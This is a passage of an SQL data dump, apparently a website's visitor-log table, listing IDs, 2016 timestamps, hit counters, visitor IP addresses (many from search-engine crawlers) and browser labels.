,'66.249.76.79',''),(62776,1474309532,1,0,1,0,'66.249.66.81',''),(62777,1474309853,2,0,2,0,'66.249.76.46',''),(62778,1474310272,1,1,0,0,'51.255.65.63','other'),(62779,1474310460,1,1,0,0,'163.172.65.38','other'),(62780,1474310570,2,2,0,0,'164.132.161.26','other'),(62781,1474310598,1,1,0,0,'164.132.161.19','other'),(62782,1474311263,1,0,1,0,'66.249.76.47',''),(62783,1474312530,1,1,0,0,'163.172.66.27','other'),(62784,1474313216,1,0,1,0,'68.180.229.34',''),(62785,1474314587,1,1,0,0,'46.200.117.223','chrome'),(62786,1474315053,1,0,1,0,'66.249.76.45',''),(62787,1474315138,1,1,0,0,'91.196.178.103','chrome'),(62788,1474315212,1,0,1,0,'66.249.76.77',''),(62789,1474317113,1,1,0,0,'51.255.65.56','other'),(62790,1474317548,1,1,0,0,'51.255.65.79','other'),(62791,1474317744,1,1,0,0,'164.132.161.73','other'),(62792,1474318103,1,1,0,0,'51.255.65.63','other'),(62793,1474318239,1,1,0,0,'51.255.65.75','other'),(62794,1474319085,1,1,0,0,'163.172.65.242','other'),(62795,1474319227,1,1,0,0,'163.172.66.160','other'),(62796,1474319372,1,0,1,0,'66.249.66.87',''),(62797,1474319420,1,1,0,0,'40.77.167.13','other'),(62798,1474319432,1,1,0,0,'51.255.65.60','other'),(62799,1474319648,1,1,0,0,'66.102.9.25','chrome'),(62800,1474319794,1,1,0,0,'40.77.167.90','other'),(62801,1474320015,1,1,0,0,'163.172.64.241','other'),(62802,1474320110,1,1,0,0,'51.255.65.20','other'),(62803,1474320498,1,1,0,0,'91.196.178.163','other'),(62804,1474320822,1,1,0,0,'51.255.65.63','other'),(62805,1474321104,1,1,0,0,'51.255.65.82','other'),(62806,1474321418,1,1,0,0,'164.132.161.77','other'),(62807,1474322353,1,1,0,0,'164.132.161.63','other'),(62808,1474323135,2,2,0,0,'69.30.234.186','other'),(62809,1474324507,1,0,1,0,'66.249.76.45',''),(62810,1474324655,1,1,0,0,'95.221.208.47','other'),(62811,1474325686,1,0,1,0,'66.249.76.46',''),(62812,1474327264,1,0,1,0,'68.180.230.236',''),(62813,1474327951,1,1,0,0,'95.79.87.217','chrome'),(62814,1474328088,1,1,0,0,'51.255.65.24','other'),(62815,1474328392,1,1,0,0,'164.132.161.9','other'),(62816,1474328551,1,1,0,0,'51.255.65.73','other'),(62817,1474328683,1,0,1,0,'66.249.66.81',''),(62818,1474328767,1,1,0,0,'164.132.161.86','other'),(62819,1474328977,1,1,0,0,'95.24.47.87','msie'),(62820,1474329221,1,1,0,0,'188.32.55.21','msie'),(62821,1474329516,1,1,0,0,'164.132.161.79','other'),(62822,1474329545,1,1,0,0,'163.172.65.42','other'),(62823,1474329867,1,1,0,0,'51.255.65.54','other'),(62824,1474330220,2,0,2,0,'66.249.66.87',''),(62825,1474330343,1,0,1,0,'66.249.76.47',''),(62826,1474330509,1,1,0,0,'163.172.65.188','other'),(62827,1474330536,1,1,0,0,'164.132.161.27','other'),(62828,1474330941,1,1,0,0,'176.193.181.127','msie'),(62829,1474330942,1,1,0,0,'37.145.111.99','msie'),(62830,1474330943,1,1,0,0,'95.24.37.103','msie'),(62831,1474330946,1,1,0,0,'188.32.212.131','msie'),(62832,1474331092,1,1,0,0,'163.172.65.26','other'),(62833,1474331684,1,1,0,0,'164.132.161.49','other'),(62834,1474332025,1,0,1,0,'66.249.76.77',''),(62835,1474332130,1,1,0,0,'164.132.161.24','other'),(62836,1474332730,1,1,0,0,'163.172.65.61','other'),(62837,1474333018,1,0,1,0,'66.249.76.46',''),(62838,1474333055,1,0,1,0,'66.249.76.45',''),(62839,1474333277,1,1,0,0,'164.132.161.37','other'),(62840,1474333509,1,1,0,0,'66.102.9.29','other'),(62841,1474334232,1,0,1,0,'68.180.229.34',''),(62842,1474334399,1,0,1,0,'66.249.66.81',''),(62843,1474334814,1,1,0,0,'163.172.65.54','other'),(62844,1474335327,1,1,0,0,'51.255.65.37','other'),(62845,1474335404,1,1,0,0,'164.132.161.15','other'),(62846,1474336616,1,1,0,0,'163.172.64.229','other'),(62847,1474336941,1,1,0,0,'163.172.65.239','other'),(62848,1474337109,1,1,0,0,'66.102.9.27','other'),(62849,1474337327,1,1,0,0,'51.255.65.96','other'),(62850,1474337721,1,1,0,0,'40.77.167.13','other'),(62851,1474338654,1,0,1,0,'66.249.76.46',''),(62852,1474339291,1,0,1,0,'66.249.76.47',''),(62853,1474339752,2,0,2,0,'66.249.76.46',''),(62854,1474340096,1,0,1,0,'66.249.66.87',''),(62855,1474340709,1,1,0,0,'66.102.9.25','other'),(62856,1474342266,1,0,1,0,'66.249.76.47',''),(62857,1474342570,1,0,1,0,'66.249.66.84',''),(62858,1474342787,1,0,1,0,'66.249.76.45',''),(62859,1474342860,1,1,0,0,'163.172.65.219','other'),(62860,1474342894,1,0,1,0,'66.249.66.177',''),(62861,1474343214,1,1,0,0,'207.46.13.25','other'),(62862,1474344310,1,1,0,0,'66.102.9.25','other'),(62863,1474345641,1,0,1,0,'66.249.66.81',''),(62864,1474345763,1,1,0,0,'51.255.65.24','other'),(62865,1474346538,1,1,0,0,'51.255.65.40','other'),(62866,1474346677,1,0,1,0,'68.180.229.34',''),(62867,1474346804,1,1,0,0,'164.132.161.54','other'),(62868,1474346917,1,1,0,0,'51.255.65.28','other'),(62869,1474347459,2,0,2,0,'66.249.76.47',''),(62870,1474348193,1,1,0,0,'51.255.65.22','other'),(62871,1474348596,1,1,0,0,'51.255.65.58','other'),(62872,1474349151,1,1,0,0,'164.132.161.70','other'),(62873,1474349553,1,1,0,0,'180.76.15.28','other'),(62874,1474349853,1,1,0,0,'91.196.178.71','firefox'),(62875,1474350337,1,1,0,0,'37.54.115.30','firefox'),(62876,1474350567,1,1,0,0,'164.132.161.52','other'),(62877,1474350904,1,1,0,0,'94.179.2.166','firefox'),(62878,1474351080,1,1,0,0,'91.196.178.168','chrome'),(62879,1474351558,1,1,0,0,'66.249.93.13','chrome'),(62880,1474351654,1,1,0,0,'95.133.33.30','firefox'),(62881,1474351691,1,1,0,0,'163.172.65.60','other'),(62882,1474351738,1,1,0,0,'164.132.161.65','other'),(62883,1474351754,1,1,0,0,'91.196.178.71','firefox'),(62884,1474351991,1,1,0,0,'163.172.66.170','other'),(62885,1474352228,1,1,0,0,'163.172.64.252','other'),(62886,1474352879,1,1,0,0,'164.132.161.42','other'),(62887,1474352906,1,1,0,0,'164.132.161.94','other'),(62888,1474353157,1,1,0,0,'163.172.65.196','other'),(62889,1474353403,2,2,0,0,'46.201.71.72','chrome'),(62890,1474353769,1,1,0,0,'164.132.161.81','other'),(62891,1474353798,1,1,0,0,'91.196.178.72','chrome'),(62892,1474353843,1,1,0,0,'51.255.65.19','other'),(62893,1474354546,1,1,0,0,'163.172.66.73','other'),(62894,1474355066,1,1,0,0,'51.255.65.48','other'),(62895,1474355121,1,1,0,0,'66.102.9.27','other'),(62896,1474355207,1,1,0,0,'176.122.98.4','chrome'),(62897,1474355606,1,1,0,0,'163.172.66.121','other'),(62898,1474356031,1,1,0,0,'164.132.161.78','other'),(62899,1474356038,1,1,0,0,'91.196.178.133','firefox'),(62900,1474356442,1,1,0,0,'93.73.234.193','firefox'),(62901,1474356699,1,1,0,0,'91.196.178.70','chrome'),(62902,1474357375,1,1,0,0,'164.132.161.64','other'),(62903,1474357910,1,1,0,0,'91.196.178.68','other'),(62904,1474358067,1,1,0,0,'91.196.178.72','firefox'),(62905,1474358119,1,1,0,0,'164.132.161.62','other'),(62906,1474358275,1,1,0,0,'164.132.161.68','other'),(62907,1474359158,1,1,0,0,'164.132.161.91','other'),(62908,1474359713,1,0,1,0,'66.249.76.81',''),(62909,1474359946,1,1,0,0,'164.132.161.28','other'),(62910,1474360011,1,1,0,0,'51.255.65.83','other'),(62911,1474360181,1,1,0,0,'164.132.161.39','other'),(62912,1474360933,1,1,0,0,'40.77.167.90','other'),(62913,1474361025,1,1,0,0,'164.132.161.37','other'),(62914,1474361310,1,1,0,0,'164.132.161.70','other'),(62915,1474361523,1,1,0,0,'164.132.161.38','other'),(62916,1474361779,1,1,0,0,'40.77.167.56','other'),(62917,1474361797,1,1,0,0,'207.46.13.25','other'),(62918,1474361914,1,0,1,0,'66.249.76.45',''),(62919,1474361992,1,1,0,0,'164.132.161.48','other'),(62920,1474362596,2,2,0,0,'91.196.178.72','firefox'),(62921,1474362769,1,1,0,0,'82.207.91.234','firefox'),(62922,1474362873,1,1,0,0,'180.76.15.18','other'),(62923,1474363267,1,0,1,0,'66.249.66.183',''),(62924,1474363681,1,0,1,0,'66.249.66.84',''),(62925,1474363768,1,1,0,0,'95.132.65.35','chrome'),(62926,1474363986,1,1,0,0,'51.255.65.39','other'),(62927,1474364313,1,1,0,0,'40.77.167.56','other'),(62928,1474364998,1,1,0,0,'46.200.0.164','firefox'),(62929,1474365382,1,1,0,0,'176.109.171.189','chrome'),(62930,1474365923,1,1,0,0,'176.241.109.84','firefox'),(62931,1474366184,1,1,0,0,'51.255.65.28','other'),(62932,1474366640,1,1,0,0,'176.109.171.189','chrome'),(62933,1474366670,1,1,0,0,'164.132.161.21','other'),(62934,1474367424,1,1,0,0,'51.255.65.71','other'),(62935,1474368187,1,1,0,0,'51.255.65.72','other'),(62936,1474368360,1,0,1,0,'66.249.76.45',''),(62937,1474369215,1,1,0,0,'40.77.167.90','other'),(62938,1474369221,1,0,1,0,'66.249.76.81',''),(62939,1474369604,1,0,1,0,'66.249.76.45',''),(62940,1474370232,1,1,0,0,'46.200.0.164','firefox'),(62941,1474370358,1,1,0,0,'164.132.161.65','other'),(62942,1474370523,1,1,0,0,'164.132.161.94','other'),(62943,1474370704,1,1,0,0,'51.255.65.63','other'),(62944,1474370842,1,1,0,0,'164.132.161.70','other'),(62945,1474371369,1,0,1,0,'66.249.76.45',''),(62946,1474371577,2,0,2,0,'66.249.76.46',''),(62947,1474372022,1,1,0,0,'51.255.65.67','other'),(62948,1474372217,1,1,0,0,'163.172.65.63','other'),(62949,1474372564,1,1,0,0,'164.132.161.17','other'),(62950,1474372702,1,1,0,0,'188.163.73.136','opera'),(62951,1474372964,1,1,0,0,'91.196.178.71','firefox'),(62952,1474373991,1,1,0,0,'37.55.131.50','chrome'),(62953,1474374280,1,1,0,0,'91.196.178.68','firefox'),(62954,1474374552,1,1,0,0,'207.46.13.25','other'),(62955,1474374607,1,1,0,0,'66.249.66.177','chrome'),(62956,1474374754,1,1,0,0,'188.163.68.211','chrome'),(62957,1474375842,1,1,0,0,'91.196.178.169','msie'),(62958,1474375949,1,1,0,0,'163.172.65.113','other'),(62959,1474376709,1,1,0,0,'66.102.9.29','other'),(62960,1474376826,1,1,0,0,'91.196.178.68','firefox'),(62961,1474376861,1,0,1,0,'66.249.76.46',''),(62962,1474377944,1,1,0,0,'207.46.13.25','other'),(62963,1474378435,1,1,0,0,'164.132.161.48','other'),(62964,1474378579,1,1,0,0,'40.77.167.90','other'),(62965,1474378592,2,0,2,0,'66.249.76.45',''),(62966,1474378636,1,1,0,0,'94.179.98.221','chrome'),(62967,1474378678,1,1,0,0,'51.255.65.30','other'),(62968,1474379276,1,1,0,0,'92.113.1.201','chrome'),(62969,1474379397,1,1,0,0,'51.255.65.78','other'),(62970,1474379594,1,1,0,0,'37.55.26.234','chrome'),(62971,1474380037,1,0,1,0,'68.180.229.34',''),(62972,1474380176,1,1,0,0,'163.172.66.129','other'),(62973,1474380313,1,1,0,0,'66.102.9.29','other'),(62974,1474380544,1,1,0,0,'91.196.178.68','firefox'),(62975,1474380593,1,1,0,0,'51.255.65.78','other'),(62976,1474380851,1,1,0,0,'164.132.161.77','other'),(62977,1474381138,1,1,0,0,'51.255.65.33','other'),(62978,1474381391,1,1,0,0,'40.77.167.56','other'),(62979,1474383030,1,0,1,0,'66.249.76.81',''),(62980,1474383788,1,1,0,0,'91.196.178.67','firefox'),(62981,1474383908,1,1,0,0,'66.102.9.29','other'),(62982,1474384477,2,0,2,0,'66.249.76.46',''),(62983,1474384543,1,1,0,0,'164.132.161.41','other'),(62984,1474384696,1,1,0,0,'94.179.49.28','chrome'),(62985,1474385290,1,1,0,0,'91.124.182.3','firefox'),(62986,1474385581,1,1,0,0,'164.132.161.71','other'),(62987,1474386827,1,0,1,0,'66.249.66.87',''),(62988,1474387510,1,1,0,0,'66.102.9.25','other'),(62989,1474387923,1,1,0,0,'164.132.161.91','other'),(62990,1474387994,1,1,0,0,'164.132.161.63','other'),(62991,1474388233,1,1,0,0,'51.255.65.43','other'),(62992,1474388234,1,1,0,0,'163.172.64.199','other'),(62993,1474388252,1,0,1,0,'66.249.76.46',''),(62994,1474388296,1,1,0,0,'164.132.161.35','other'),(62995,1474388911,1,1,0,0,'51.255.65.83','other'),(62996,1474389456,1,0,1,0,'66.249.76.81',''),(62997,1474389718,1,0,1,0,'66.249.76.46',''),(62998,1474389816,1,1,0,0,'164.132.161.39','other'),(62999,1474390029,1,1,0,0,'163.172.65.38','other'),(63000,1474390111,1,1,0,0,'91.196.178.65','chrome'),(63001,1474390492,1,1,0,0,'51.255.65.18','other'),(63002,1474390807,1,0,1,0,'66.249.66.87',''),(63003,1474390905,1,1,0,0,'95.133.238.249','firefox'),(63004,1474391108,1,1,0,0,'66.102.9.25','other'),(63005,1474392198,1,1,0,0,'164.132.161.55','other'),(63006,1474392887,1,1,0,0,'51.255.65.37','other'),(63007,1474394669,1,1,0,0,'95.135.112.66','chrome'),(63008,1474394688,1,0,1,0,'66.249.76.47',''),(63009,1474394708,1,1,0,0,'66.102.9.27','other'),(63010,1474394827,1,1,0,0,'141.8.183.25','other'),(63011,1474395082,1,1,0,0,'82.145.220.210','other'),(63012,1474396093,1,1,0,0,'157.55.39.21','other'),(63013,1474396411,1,1,0,0,'164.132.161.87','other'),(63014,1474396852,1,1,0,0,'164.132.161.67','other'),(63015,1474397037,1,1,0,0,'51.255.65.72','other'),(63016,1474397440,11,11,0,0,'69.30.198.178','other'),(63017,1474397580,1,1,0,0,'157.55.39.21','other'),(63018,1474398308,1,1,0,0,'66.102.9.29','other'),(63019,1474398435,1,1,0,0,'51.255.65.75','other'),(63020,1474398845,1,1,0,0,'95.221.223.47','msie'),(63021,1474398846,1,1,0,0,'37.204.152.138','chrome'),(63022,1474398847,1,1,0,0,'188.32.128.63','chrome'),(63024,1474399087,1,1,0,0,'163.172.66.115','other'),(63025,1474400112,1,1,0,0,'163.172.66.116','other'),(63026,1474400202,1,1,0,0,'163.172.66.84','other'),(63027,1474400270,1,1,0,0,'51.255.65.25','other'),(63028,1474400953,5,5,0,0,'51.254.131.243','other'),(63029,1474401315,1,0,1,0,'66.249.66.81',''),(63030,1474401911,1,1,0,0,'66.102.9.27','other'),(63031,1474402030,2,1,1,0,'66.249.76.45',''),(63032,1474402567,1,1,0,0,'51.255.65.78','other'),(63033,1474402796,1,1,0,0,'51.255.65.20','other'),(63034,1474403806,1,1,0,0,'164.132.161.25','other'),(63035,1474403837,2,2,0,0,'69.30.211.2','other'),(63036,1474404094,1,1,0,0,'164.132.161.96','other'),(63037,1474404364,1,1,0,0,'164.132.161.97','other'),(63038,1474404960,1,1,0,0,'164.132.161.63','other'),(63039,1474405052,1,1,0,0,'130.180.218.164','chrome'),(63040,1474405186,1,1,0,0,'163.172.66.117','other'),(63041,1474405306,1,1,0,0,'51.255.65.23','other'),(63042,1474405492,1,1,0,0,'130.193.50.34','other'),(63043,1474405551,1,1,0,0,'66.102.9.27','other'),(63044,1474405855,1,1,0,0,'163.172.66.160','other'),(63045,1474406716,1,1,0,0,'66.249.76.47','chrome'),(63046,1474407583,1,0,1,0,'66.249.76.46',''),(63047,1474407638,1,0,1,0,'66.249.76.77',''),(63048,1474407841,1,0,1,0,'66.249.66.81',''),(63049,1474408369,1,1,0,0,'40.77.167.56','other'),(63050,1474408399,1,1,0,0,'66.249.76.45','chrome'),(63051,1474408958,1,1,0,0,'164.132.161.14','other'),(63052,1474409143,1,1,0,0,'66.102.9.29','other'),(63053,1474409293,1,1,0,0,'163.172.64.188','other'),(63054,1474409823,1,1,0,0,'40.77.167.90','other'),(63055,1474409859,1,1,0,0,'94.179.109.149','chrome'),(63056,1474409973,1,1,0,0,'163.172.66.93','other'),(63057,1474410643,1,0,1,0,'66.249.66.81',''),(63058,1474411233,1,1,0,0,'163.172.66.140','other'),(63059,1474412145,1,1,0,0,'164.132.161.28','other'),(63060,1474412239,1,1,0,0,'51.255.65.89','other'),(63061,1474412392,1,1,0,0,'178.94.213.198','chrome'),(63062,1474412769,1,1,0,0,'66.102.9.27','other'),(63063,1474414717,1,1,0,0,'164.132.161.19','other'),(63064,1474415767,1,1,0,0,'51.255.65.85','other'),(63065,1474416008,1,0,1,0,'66.249.76.46',''),(63066,1474416219,1,1,0,0,'164.132.161.54','other'),(63067,1474416393,1,1,0,0,'51.255.65.53','other'),(63068,1474416445,1,1,0,0,'66.102.9.27','other'),(63069,1474416460,1,1,0,0,'163.172.64.216','other'),(63070,1474416766,1,1,0,0,'164.132.161.43','other'),(63071,1474416843,1,1,0,0,'163.172.66.102','other'),(63072,1474418220,1,0,1,0,'66.249.66.81',''),(63073,1474418478,1,1,0,0,'164.132.161.28','other'),(63074,1474418486,1,0,1,0,'66.249.76.45',''),(63075,1474418520,1,1,0,0,'51.255.65.42','other'),(63076,1474418540,1,0,1,0,'66.249.76.81',''),(63077,1474418806,1,1,0,0,'40.77.167.56','other'),(63078,1474419501,1,1,0,0,'163.172.66.69','other'),(63079,1474419692,1,1,0,0,'51.255.65.25','other'),(63080,1474419708,1,1,0,0,'66.249.76.46','chrome'),(63081,1474419907,1,1,0,0,'66.102.9.27','other'),(63082,1474420093,1,1,0,0,'66.249.66.177','chrome'),(63083,1474420426,1,1,0,0,'51.255.65.6','other'),(63084,1474421379,1,1,0,0,'164.132.161.30','other'),(63085,1474421728,1,0,1,0,'66.249.76.45',''),(63086,1474422854,1,1,0,0,'51.255.65.86','other'),(63087,1474423442,1,1,0,0,'164.132.161.76','other'),(63088,1474423564,1,1,0,0,'207.46.13.93','other'),(63089,1474423643,1,1,0,0,'66.102.9.25','other'),(63090,1474423778,1,0,1,0,'66.249.76.77',''),(63091,1474423940,1,1,0,0,'40.77.167.56','other'),(63092,1474424411,1,1,0,0,'164.132.161.55','other'),(63093,1474425902,1,1,0,0,'157.55.39.21','other'),(63094,1474426029,1,1,0,0,'66.249.76.47','chrome'),(63095,1474427219,1,1,0,0,'51.255.65.47','other'),(63096,1474427353,1,1,0,0,'66.102.9.27','other'),(63097,1474427482,1,1,0,0,'163.172.66.41','other'),(63098,1474427917,1,0,1,0,'68.180.229.34',''),(63099,1474428224,1,1,0,0,'164.132.161.69','other'),(63100,1474428270,1,1,0,0,'51.255.65.38','other'),(63101,1474428525,1,1,0,0,'207.46.13.93','other'),(63102,1474428534,1,1,0,0,'51.255.65.24','other'),(63103,1474428740,1,1,0,0,'163.172.66.66','other'),(63104,1474428836,1,1,0,0,'66.102.9.25','chrome'),(63105,1474429162,1,1,0,0,'164.132.161.96','other'),(63106,1474430400,1,1,0,0,'51.255.65.70','other'),(63107,1474430984,1,1,0,0,'163.172.65.39','other'),(63108,1474431129,1,1,0,0,'164.132.161.92','other'),(63109,1474431353,1,1,0,0,'164.132.161.13','other'),(63110,1474431376,1,1,0,0,'163.172.66.78','other'),(63111,1474431755,1,1,0,0,'164.132.161.77','other'),(63112,1474431933,1,1,0,0,'51.255.65.63','other'),(63113,1474432173,1,1,0,0,'164.132.161.15','other'),(63114,1474433430,1,1,0,0,'163.172.66.121','other'),(63115,1474433466,1,0,1,0,'66.249.66.87',''),(63116,1474434422,1,1,0,0,'51.255.65.32','other'),(63117,1474434790,1,0,1,0,'66.249.76.47',''),(63118,1474434842,1,1,0,0,'163.172.65.114','other'),(63119,1474435459,1,1,0,0,'94.179.7.227','firefox'),(63120,1474436160,1,1,0,0,'180.76.15.142','other'),(63121,1474436312,1,1,0,0,'51.255.65.64','other'),(63122,1474436353,2,2,0,0,'37.54.158.61','chrome'),(63123,1474436435,1,1,0,0,'164.132.161.30','other'),(63124,1474436493,1,0,1,0,'66.249.76.47',''),(63125,1474436628,1,0,1,0,'66.249.66.180',''),(63126,1474437918,1,1,0,0,'66.249.76.46','chrome'),(63127,1474438160,1,1,0,0,'91.196.178.72','firefox'),(63128,1474438186,2,2,0,0,'91.196.178.68','chrome'),(63129,1474438260,1,1,0,0,'66.249.93.15','chrome'),(63130,1474438366,1,1,0,0,'91.196.178.68','other'),(63131,1474438587,1,1,0,0,'163.172.66.103','other'),(63132,1474439101,1,1,0,0,'37.54.158.61','chrome'),(63133,1474439564,1,0,1,0,'66.249.76.46',''),(63134,1474439799,1,1,0,0,'5.9.88.103','other'),(63135,1474439909,1,1,0,0,'91.196.178.71','firefox'),(63136,1474439979,1,1,0,0,'94.179.28.47','chrome'),(63137,1474440297,1,1,0,0,'51.255.65.69','other'),(63138,1474440462,1,1,0,0,'37.54.219.216','firefox'),(63139,1474440894,1,1,0,0,'212.111.196.33','chrome'),(63140,1474441149,1,1,0,0,'163.172.66.6','other'),(63141,1474441156,1,1,0,0,'178.93.228.82','other'),(63142,1474441419,1,1,0,0,'163.172.66.158','other'),(63143,1474441514,1,1,0,0,'66.102.9.27','other'),(63144,1474441862,1,0,1,0,'66.249.76.46',''),(63145,1474441939,1,0,1,0,'66.249.66.81',''),(63146,1474442420,1,1,0,0,'94.178.172.96','other'),(63147,1474443804,1,0,1,0,'66.249.76.46',''),(63148,1474444068,1,1,0,0,'91.196.178.71','firefox'),(63149,1474445111,1,1,0,0,'66.102.9.29','other'),(63150,1474445185,1,1,0,0,'157.55.39.21','other'),(63151,1474445366,2,0,2,0,'66.249.76.45',''),(63152,1474445741,1,0,1,0,'66.249.66.81',''),(63153,1474445767,2,0,2,0,'66.249.76.47',''),(63154,1474446237,1,1,0,0,'37.54.158.61','chrome'),(63155,1474446375,1,1,0,0,'164.132.161.34','other'),(63156,1474446414,1,1,0,0,'209.249.5.249','other'),(63157,1474446516,1,1,0,0,'91.196.178.135','chrome'),(63158,1474446737,1,1,0,0,'164.132.161.78','other'),(63159,1474447094,1,1,0,0,'66.249.76.46','chrome'),(63160,1474448300,1,0,1,0,'66.249.76.46',''),(63161,1474448338,1,0,1,0,'66.249.76.79',''),(63162,1474448711,1,1,0,0,'66.102.9.29','other'),(63163,1474449543,10,10,0,0,'69.58.178.58','firefox'),(63164,1474449722,1,1,0,0,'164.132.161.90','other'),(63165,1474449876,1,1,0,0,'94.178.7.205','chrome'),(63166,1474450132,1,1,0,0,'37.54.22.5','chrome'),(63167,1474450154,1,1,0,0,'164.132.161.3','other'),(63168,1474450163,1,0,1,0,'68.180.229.34',''),(63169,1474450341,1,0,1,0,'66.249.76.46',''),(63170,1474450870,1,1,0,0,'163.172.66.58','other'),(63171,1474451372,1,1,0,0,'163.172.65.122','other'),(63172,1474451506,2,2,0,0,'144.76.8.132','other'),(63173,1474451831,1,1,0,0,'66.249.76.77','chrome'),(63174,1474452114,1,1,0,0,'180.76.15.21','other'),(63175,1474452158,1,1,0,0,'40.77.167.56','other'),(63176,1474452168,1,1,0,0,'93.80.51.201','other'),(63177,1474452231,1,0,1,0,'66.249.76.45',''),(63178,1474452315,1,0,1,0,'66.249.66.84',''),(63179,1474452388,1,1,0,0,'66.102.9.29','other'),(63180,1474452686,3,3,0,0,'207.46.13.93','other'),(63181,1474452881,1,1,0,0,'94.179.103.149','chrome'),(63182,1474452977,1,1,0,0,'176.98.69.233','chrome'),(63183,1474453022,1,1,0,0,'157.55.39.118','other'),(63184,1474453094,1,1,0,0,'94.179.104.14','firefox'),(63185,1474453365,1,1,0,0,'164.132.161.6','other'),(63186,1474453445,1,1,0,0,'163.172.66.140','other'),(63187,1474453877,1,1,0,0,'51.255.65.9','other'),(63188,1474454133,1,1,0,0,'164.132.161.72','other'),(63189,1474454452,1,1,0,0,'91.196.178.163','firefox'),(63190,1474455251,1,1,0,0,'163.172.66.153','other'),(63191,1474455296,1,1,0,0,'163.172.66.168','other'),(63192,1474455995,1,1,0,0,'66.102.9.27','other'),(63193,1474456388,1,1,0,0,'91.196.178.68','firefox'),(63194,1474456512,1,0,1,0,'66.249.76.45',''),(63195,1474456513,1,0,1,0,'66.249.66.87',''),(63196,1474456514,2,0,2,0,'66.249.76.46',''),(63197,1474456610,1,1,0,0,'157.55.39.21','other'),(63198,1474456962,1,1,0,0,'51.255.36.86','other'),(63199,1474457373,1,1,0,0,'91.196.178.71','firefox'),(63200,1474457741,1,1,0,0,'31.31.126.111','chrome'),(63201,1474458276,1,1,0,0,'91.196.178.71','firefox'),(63202,1474458750,1,1,0,0,'37.54.158.61','chrome'),(63203,1474459504,1,1,0,0,'40.77.167.56','other'),(63204,1474459509,1,1,0,0,'91.196.178.67','chrome'),(63205,1474459610,1,1,0,0,'66.102.9.29','other'),(63206,1474459675,1,1,0,0,'94.179.103.149','chrome'),(63207,1474461448,2,2,0,0,'176.9.10.227','other'),(63208,1474461848,1,1,0,0,'91.196.178.71','firefox'),(63209,1474461910,1,1,0,0,'176.122.108.246','chrome'),(63210,1474462609,1,1,0,0,'193.219.124.35','other'),(63211,1474462855,1,1,0,0,'207.46.13.93','other'),(63212,1474463143,1,1,0,0,'66.102.9.29','other'),(63213,1474463594,1,0,1,0,'66.249.66.87',''),(63214,1474463939,3,0,3,0,'68.180.229.34',''),(63215,1474464093,1,1,0,0,'91.229.121.1','firefox'),(63216,1474464907,2,0,2,0,'68.180.229.34',''),(63217,1474465119,1,1,0,0,'91.196.178.71','firefox'),(63218,1474465290,1,0,1,0,'66.249.76.79',''),(63219,1474465310,1,0,1,0,'66.249.76.47',''),(63220,1474465466,1,0,1,0,'66.249.66.84',''),(63221,1474466478,1,1,0,0,'95.135.31.106','msie'),(63222,1474466551,1,1,0,0,'91.124.169.104','opera'),(63223,1474466571,2,2,0,0,'40.77.167.56','other'),(63224,1474466762,1,1,0,0,'66.102.9.27','other'),(63225,1474466970,1,1,0,0,'157.55.39.21','other'),(63226,1474467084,3,0,3,0,'68.180.229.34',''),(63227,1474467695,1,1,0,0,'37.54.21.101','firefox'),(63228,1474468021,1,1,0,0,'91.196.178.164','chrome'),(63229,1474468090,1,0,1,0,'68.180.229.34',''),(63230,1474469571,1,1,0,0,'95.28.56.72','chrome'),(63231,1474470327,1,1,0,0,'46.242.77.172','msie'),(63232,1474470370,1,1,0,0,'66.102.9.29','other'),(63233,1474470483,1,1,0,0,'91.196.178.68','firefox'),(63234,1474470611,1,1,0,0,'46.188.53.124','opera'),(63235,1474471120,1,1,0,0,'5.228.38.68','chrome'),(63236,1474471136,2,0,2,0,'66.249.76.47',''),(63237,1474471184,1,1,0,0,'37.115.110.191','chrome'),(63238,1474471224,1,0,1,0,'66.249.76.46',''),(63239,1474472267,1,0,1,0,'68.180.229.34',''),(63240,1474472536,1,1,0,0,'91.124.182.3','firefox'),(63241,1474473135,1,1,0,0,'164.132.161.46','other'),(63242,1474473270,1,1,0,0,'51.255.65.19','other'),(63243,1474473911,1,1,0,0,'164.132.161.53','other'),(63244,1474474025,1,1,0,0,'66.102.9.25','other'),(63245,1474474652,1,1,0,0,'163.172.66.130','other'),(63246,1474474744,1,0,1,0,'66.249.76.46',''),(63247,1474475076,1,1,0,0,'164.132.161.75','other'),(63248,1474475648,1,1,0,0,'91.124.182.3','firefox'),(63249,1474475844,1,1,0,0,'164.132.161.90','other'),(63250,1474476035,1,0,1,0,'68.180.229.34',''),(63251,1474477595,1,1,0,0,'66.102.9.29','other'),(63252,1474477630,1,1,0,0,'163.172.66.156','other'),(63253,1474478254,1,0,1,0,'66.249.76.45',''),(63254,1474478655,1,1,0,0,'163.172.66.15','other'),(63255,1474479944,1,1,0,0,'66.102.9.25','chrome'),(63256,1474480668,1,1,0,0,'91.196.178.71','chrome'),(63257,1474481175,1,1,0,0,'66.102.9.27','other'),(63258,1474481214,1,1,0,0,'163.172.65.45','other'),(63259,1474481346,1,1,0,0,'82.145.222.13','other'),(63260,1474481720,1,1,0,0,'51.255.65.58','other'),(63261,1474482644,1,1,0,0,'51.255.65.7','other'),(63262,1474483438,1,0,1,0,'66.249.66.84',''),(63263,1474483552,1,0,1,0,'66.249.76.81',''),(63264,1474483805,1,1,0,0,'185.26.180.166','chrome'),(63265,1474484274,1,1,0,0,'51.255.65.37','other'),(63266,1474484707,1,1,0,0,'66.102.9.27','other'),(63267,1474484817,1,1,0,0,'51.255.65.94','other'),(63268,1474484865,1,1,0,0,'164.132.161.83','other'),(63269,1474485084,1,1,0,0,'40.77.167.56','other'),(63270,1474485675,1,1,0,0,'180.76.15.159','other'),(63271,1474486071,1,1,0,0,'176.100.5.113','chrome'),(63272,1474487369,1,1,0,0,'46.211.2.72','chrome'),(63273,1474488567,1,1,0,0,'66.102.9.27','other'),(63274,1474488763,1,1,0,0,'164.132.161.17','other'),(63275,1474488782,61,61,0,0,'5.9.89.170','other'),(63276,1474488907,1,0,1,0,'66.249.76.46',''),(63277,1474489407,1,1,0,0,'40.77.167.56','other'),(63278,1474489628,1,1,0,0,'164.132.161.74','other'),(63279,1474490606,1,1,0,0,'164.132.161.81','other'),(63280,1474490759,26,26,0,0,'91.121.86.136','other'),(63281,1474490789,1,1,0,0,'51.255.65.89','other'),(63282,1474491113,1,1,0,0,'163.172.65.44','other'),(63283,1474491165,1,1,0,0,'193.104.208.46','chrome'),(63284,1474491581,1,1,0,0,'51.255.65.62','other'),(63285,1474492053,1,1,0,0,'66.102.9.29','other'),(63286,1474492202,1,1,0,0,'5.32.182.169','msie'),(63287,1474492925,1,1,0,0,'66.249.76.47','chrome'),(63288,1474493000,1,1,0,0,'66.249.76.45','chrome'),(63289,1474493075,3,2,1,0,'6